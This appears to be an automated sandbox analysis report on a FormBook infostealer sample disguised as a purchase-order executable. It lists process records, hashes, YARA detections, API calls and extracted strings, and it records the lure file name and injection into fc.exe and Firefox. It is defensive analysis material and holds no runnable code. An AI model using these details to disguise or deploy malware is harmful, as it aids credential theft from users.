                                                          x-turbo-charged-by: LiteSpeed
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5jnOsFQu5eOfRbTaFe80WCrju%2BehcBF7KH0y1botxpSBkl7PxfLDHAaFpGaQz8L36u7DNDejYuHRXXVjaKuLWVOmiR5Od4AU2c5mw9yEZgftF6voheOBj8KUVgXj81T03fSH"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 902cb8e0ca9b4301-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1556&min_rtt=1556&rtt_var=778&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=484&delivery_rate=0&cwnd=55&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Target ID:0
                                                          Start time:03:23:43
                                                          Start date:16/01/2025
                                                          Path:C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exe"
                                                          Imagebase:0xf10000
                                                          File size:289'280 bytes
                                                          MD5 hash:BD83674D593F0DBB40A73B74046E5E9C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2422961999.0000000005A70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2419345292.0000000002700000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:03:24:12
                                                          Start date:16/01/2025
                                                          Path:C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe"
                                                          Imagebase:0x3f0000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3926275354.0000000008440000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3920397657.0000000004160000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:4
                                                          Start time:03:24:13
                                                          Start date:16/01/2025
                                                          Path:C:\Windows\SysWOW64\fc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\fc.exe"
                                                          Imagebase:0x850000
                                                          File size:22'528 bytes
                                                          MD5 hash:4D5F86B337D0D099E18B14F1428AAEFF
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3919504279.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3920082555.0000000003470000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3920171472.0000000003610000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:moderate
                                                          Has exited:false

                                                          Target ID:6
                                                          Start time:03:24:38
                                                          Start date:16/01/2025
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0x7ff79f9e0000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                            Execution Graph

                                                            Execution Coverage:1.2%
                                                            Dynamic/Decrypted Code Coverage:5.2%
                                                            Signature Coverage:13.3%
                                                            Total number of Nodes:135
                                                            Total number of Limit Nodes:8

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            [control_flow_graph figure: first node 41, f28b13-f28b4a]
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                            • Associated: 00000000.00000002.2418502215.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f10000_PO No.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "$"
                                                            • API String ID: 0-3758156766
                                                            • Opcode ID: 063b6d386616b1ea3c6fec4a094d4e4aa879a73abadd00f48a304ef7574ee870
                                                            • Instruction ID: 518512b92e610a2c72f27c2807d80c46f8afbc142dbd0561df3d338ac934ec81
                                                            • Opcode Fuzzy Hash: 063b6d386616b1ea3c6fec4a094d4e4aa879a73abadd00f48a304ef7574ee870
                                                            • Instruction Fuzzy Hash: 8FF104B1D01229AFDF20DFA4DC84BEEB7B9AF44350F1481A9E509A7241DB34AE45DF90

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            [control_flow_graph figure: first node 173, f11b91-f11b93]
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                            • Associated: 00000000.00000002.2418502215.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f10000_PO No.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gfff$qi
                                                            • API String ID: 0-3408824469
                                                            • Opcode ID: a95e5d50df6edfb49d81f520a931f9eb9f4de885697bd48b850d5fb313312a87
                                                            • Instruction ID: 423b6c892c94dda720ebecd827f8b305aea5cd99ab58aeaba2f2b85da99e3fd2
                                                            • Opcode Fuzzy Hash: a95e5d50df6edfb49d81f520a931f9eb9f4de885697bd48b850d5fb313312a87
                                                            • Instruction Fuzzy Hash: 0DB1D273A483560FD71ACA2C8C922E87F55FF92320F1852AEDA51CF2D3E2118996D7C0

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 249 f27ca3-f27ccc call f3f7e3 252 f27cd2-f27ce0 call f3fde3 249->252 253 f27cce-f27cd1 249->253 256 f27ce2-f27ced call f40083 252->256 257 f27cf0-f27d01 call f3e283 252->257 256->257 262 f27d03-f27d17 LdrLoadDll 257->262 263 f27d1a-f27d1d 257->263 262->263
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00F27D15
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                            • Associated: 00000000.00000002.2418502215.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f10000_PO No.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: a4c9aebcca78bf2c79862b32e3806d5fc13de4f3c4e116857794fabdc04dc3bf
                                                            • Instruction ID: 9aa9485dbd212c0223421ca34ad0ea810d8502a68f31c66c1b0b4991b95c67cc
                                                            • Opcode Fuzzy Hash: a4c9aebcca78bf2c79862b32e3806d5fc13de4f3c4e116857794fabdc04dc3bf
                                                            • Instruction Fuzzy Hash: A3011EB5E4420DABDB10EBE4DC42FDEB778AB54314F0041A5E90897240F635EB589B91

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 274 f3cb43-f3cb7f call f14903 call f3dd73 NtClose
                                                            APIs
                                                            • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 00F3CB7A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                            • Associated: 00000000.00000002.2418502215.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f10000_PO No.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 4475380e52142e82ee3346c97f1c1c9fb8c96161e239dd7ee8ef83ea55ab2f30
                                                            • Instruction ID: 0859b049b883547432c8f9177687b0d89b069a4b3fd26d60ad0d357e17a36482
                                                            • Opcode Fuzzy Hash: 4475380e52142e82ee3346c97f1c1c9fb8c96161e239dd7ee8ef83ea55ab2f30
                                                            • Instruction Fuzzy Hash: 6FE04672200244BBD220EA59DC02F9BB76CDFC5720F008555FA58A7242C671B91187E0

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 288 fd2b60-fd2b6c LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 65f4440766d6128b152e8c64246ceb6c07ab448589714665076529bb71f51e76
                                                            • Instruction ID: 3e764b1e9f245c7651c747a94e849b882e0032962d548aa108ace271c68f3463
                                                            • Opcode Fuzzy Hash: 65f4440766d6128b152e8c64246ceb6c07ab448589714665076529bb71f51e76
                                                            • Instruction Fuzzy Hash: 0990026120244013420571598414616400A87E0741B55C032E1054590EC92989927126

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 289 fd2c70-fd2c7c LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: a51bffae3d9640044632dae73ccc36f5dc1443ec03a74b4fa50e8cb4448e82d6
                                                            • Instruction ID: aa0ef7dc569921d01adcd22b94149f9d3583c54bd46764b4a3a2b720793a5fc0
                                                            • Opcode Fuzzy Hash: a51bffae3d9640044632dae73ccc36f5dc1443ec03a74b4fa50e8cb4448e82d6
                                                            • Instruction Fuzzy Hash: BD9002312014C812D2107159C40474A000587D0741F59C432A4464658E8A9989927122

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 290 fd2df0-fd2dfc LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 94c412ed7b5636dd7f45e1d4539c1be915cf2a756b15b08eafd0a93d443b0ba7
                                                            • Instruction ID: 2805ce5739546bf28ef350ca54bd94a1153e5ae1c88c77c206af936020e35fcb
                                                            • Opcode Fuzzy Hash: 94c412ed7b5636dd7f45e1d4539c1be915cf2a756b15b08eafd0a93d443b0ba7
                                                            • Instruction Fuzzy Hash: D190023120144423D21171598504707000987D0781F95C433A0464558E9A5A8A53B122

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 291 fd35c0-fd35cc LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 881a4548115e74ad18fd9c443eca6b208b17d7186afcea8ba606ddcad8ad9aca
                                                            • Instruction ID: 3a94c62ced44d4a3a77684c6d6c9775427a01b8979a48b7f5db9c99936fa5078
                                                            • Opcode Fuzzy Hash: 881a4548115e74ad18fd9c443eca6b208b17d7186afcea8ba606ddcad8ad9aca
                                                            • Instruction Fuzzy Hash: 4890023160554412D20071598514706100587D0741F65C432A0464568E8B998A5275A3

                                                            Control-flow Graph

                                                            APIs
                                                            • PostThreadMessageW.USER32(17O3k-2I,00000111,00000000,00000000), ref: 00F2456A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                            • Associated: 00000000.00000002.2418502215.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f10000_PO No.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 17O3k-2I$17O3k-2I
                                                            • API String ID: 1836367815-2455829943
                                                            • Opcode ID: fcc73c7b8cc7b4af6ded3372faa6a9cb8a3cf5fe988ec8993084df4fd089c6da
                                                            • Instruction ID: 8da1417485c7dd1c354f28c4f3a47e4406c82b84a8941f162d5916ec7613080e
                                                            • Opcode Fuzzy Hash: fcc73c7b8cc7b4af6ded3372faa6a9cb8a3cf5fe988ec8993084df4fd089c6da
                                                            • Instruction Fuzzy Hash: 0C117AB2D4415C7ACB00EBE09C82DEE7F7CEF40368F0440A8F954AB201C3789E068BA5

                                                            Control-flow Graph

                                                            APIs
                                                            • PostThreadMessageW.USER32(17O3k-2I,00000111,00000000,00000000), ref: 00F2456A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                            • Associated: 00000000.00000002.2418502215.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f10000_PO No.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 17O3k-2I$17O3k-2I
                                                            • API String ID: 1836367815-2455829943
                                                            • Opcode ID: 20b814a7f5afbd628b3306073f99bc8e32a910d4eb99ef896f182a05ec17f2cf
                                                            • Instruction ID: 06f8386d459faca35cc0495673b241a4928c20f704e869c3eb7680e6e163f3f9
                                                            • Opcode Fuzzy Hash: 20b814a7f5afbd628b3306073f99bc8e32a910d4eb99ef896f182a05ec17f2cf
                                                            • Instruction Fuzzy Hash: 0301D2B2D0025C7ADB10ABE19C82DEF7B7CDF417A4F048068FA04A7241D6689E068BA5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 269 f3ceb3-f3cef4 call f14903 call f3dd73 RtlFreeHeap
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,00018623,00000007,00000000,00000004,00000000,00F27514,000000F4), ref: 00F3CEEF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                            • Associated: 00000000.00000002.2418502215.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f10000_PO No.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 4da538de4a336ad0334eb70f56b6e4fc79bf1a1573d1aefafb213d21a41e79ef
                                                            • Instruction ID: 5d8fdad19e324383c9ed734a54ab6f76ed312a353160cc55142b12ab3eef96a2
                                                            • Opcode Fuzzy Hash: 4da538de4a336ad0334eb70f56b6e4fc79bf1a1573d1aefafb213d21a41e79ef
                                                            • Instruction Fuzzy Hash: D2E06DB1604204BBD610EE58EC41FDF37ACEFC8710F004008F918A7242C771B9118BB4

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 264 f3ce63-f3cea7 call f14903 call f3dd73 RtlAllocateHeap
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,00F2EA4E,?,?,00000000,?,00F2EA4E,?,?,?), ref: 00F3CEA2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                            • Associated: 00000000.00000002.2418502215.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f10000_PO No.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 3f90dd9010fafa6a22c10d148e61cf8cfc03c1fbbda787b6d6695d8e77fb27a4
                                                            • Instruction ID: d233b5778b652f3d789cd0bb9c71052e73f7ba4c6a5e486557c9bf5dd321e506
                                                            • Opcode Fuzzy Hash: 3f90dd9010fafa6a22c10d148e61cf8cfc03c1fbbda787b6d6695d8e77fb27a4
                                                            • Instruction Fuzzy Hash: E3E06DB2614244BBD614EE58DC42EAB77ACEFC8710F004049FA08A7242C770B91086B4

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 279 f3cf03-f3cf38 call f14903 call f3dd73 ExitProcess
                                                            APIs
                                                            • ExitProcess.KERNEL32(?,00000000,00000000,?,004D1854,?,?,004D1854), ref: 00F3CF33
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                            • Associated: 00000000.00000002.2418502215.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f10000_PO No.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcess
                                                            • String ID:
                                                            • API String ID: 621844428-0
                                                            • Opcode ID: 5230a997c7839df9915626ca5e5720bb1dd2af9a8acc6ab531059eb0aa4f8316
                                                            • Instruction ID: f22521f08d4fbd7755f7eb5f0adbbb2489d81485411ea96a012d0b06f34084e3
                                                            • Opcode Fuzzy Hash: 5230a997c7839df9915626ca5e5720bb1dd2af9a8acc6ab531059eb0aa4f8316
                                                            • Instruction Fuzzy Hash: 19E08C326006147BC220EE59EC01F9B77ACDFC5720F108095FA08A7286D6B5B9108BF4

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 284 fd2c0a-fd2c0f 285 fd2c1f-fd2c26 LdrInitializeThunk 284->285 286 fd2c11-fd2c18 284->286
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            Strings
                                                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01048F2D
                                                            • *** then kb to get the faulting stack, xrefs: 01048FCC
                                                            • The instruction at %p referenced memory at %p., xrefs: 01048EE2
                                                            • *** An Access Violation occurred in %ws:%s, xrefs: 01048F3F
                                                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01048F34
                                                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01048F26
                                                            • *** enter .exr %p for the exception record, xrefs: 01048FA1
                                                            • The instruction at %p tried to %s , xrefs: 01048F66
                                                            • The critical section is owned by thread %p., xrefs: 01048E69
                                                            • *** Inpage error in %ws:%s, xrefs: 01048EC8
                                                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01048DB5
                                                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01048DD3
                                                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01048DA3
                                                            • a NULL pointer, xrefs: 01048F90
                                                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01048E3F
                                                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01048FEF
                                                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01048E4B
                                                            • The resource is owned shared by %d threads, xrefs: 01048E2E
                                                            • <unknown>, xrefs: 01048D2E, 01048D81, 01048E00, 01048E49, 01048EC7, 01048F3E
                                                            • Go determine why that thread has not released the critical section., xrefs: 01048E75
                                                            • *** Resource timeout (%p) in %ws:%s, xrefs: 01048E02
                                                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01048E86
                                                            • This failed because of error %Ix., xrefs: 01048EF6
                                                            • read from, xrefs: 01048F5D, 01048F62
                                                            • write to, xrefs: 01048F56
                                                            • *** enter .cxr %p for the context, xrefs: 01048FBD
                                                            • The resource is owned exclusively by thread %p, xrefs: 01048E24
                                                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01048D8C
                                                            • an invalid address, %p, xrefs: 01048F7F
                                                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01048DC4
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-2160512332
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-3089669407
                                                            Strings
                                                            • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 01035A84
                                                            • @, xrefs: 0103647A
                                                            • LanguageConfigurationPending, xrefs: 01036221
                                                            • @, xrefs: 010361B0
                                                            • Control Panel\Desktop, xrefs: 0103615E
                                                            • @, xrefs: 01036277
                                                            • @, xrefs: 010363A0
                                                            • @, xrefs: 01036027
                                                            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 01035FE1
                                                            • PreferredUILanguagesPending, xrefs: 010361D2
                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0103635D
                                                            • PreferredUILanguages, xrefs: 010363D1
                                                            • LanguageConfiguration, xrefs: 01036420
                                                            • InstallLanguageFallback, xrefs: 01036050
                                                            Strings
                                                            • Critical section address, xrefs: 01005425, 010054BC, 01005534
                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010054E2
                                                            • Address of the debug info found in the active list., xrefs: 010054AE, 010054FA
                                                            • corrupted critical section, xrefs: 010054C2
                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 01005543
                                                            • double initialized or corrupted critical section, xrefs: 01005508
                                                            • Invalid debug info address of this critical section, xrefs: 010054B6
                                                            • undeleted critical section in freed memory, xrefs: 0100542B
                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0100540A, 01005496, 01005519
                                                            • 8, xrefs: 010052E3
                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010054CE
                                                            • Thread identifier, xrefs: 0100553A
                                                            • Critical section debug info address, xrefs: 0100541F, 0100552E
                                                            • Critical section address., xrefs: 01005502
                                                            Strings
                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01002624
                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 010022E4
                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01002506
                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01002602
                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 010024C0
                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01002412
                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01002498
                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01002409
                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 0100261F
                                                            • @, xrefs: 0100259B
                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 010025EB
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                            • API String ID: 0-360209818
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                            • API String ID: 0-2515994595
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                            • API String ID: 0-3591852110
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                            • API String ID: 0-3197712848
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                            • API String ID: 0-3532704233
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                            • API String ID: 0-1357697941
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
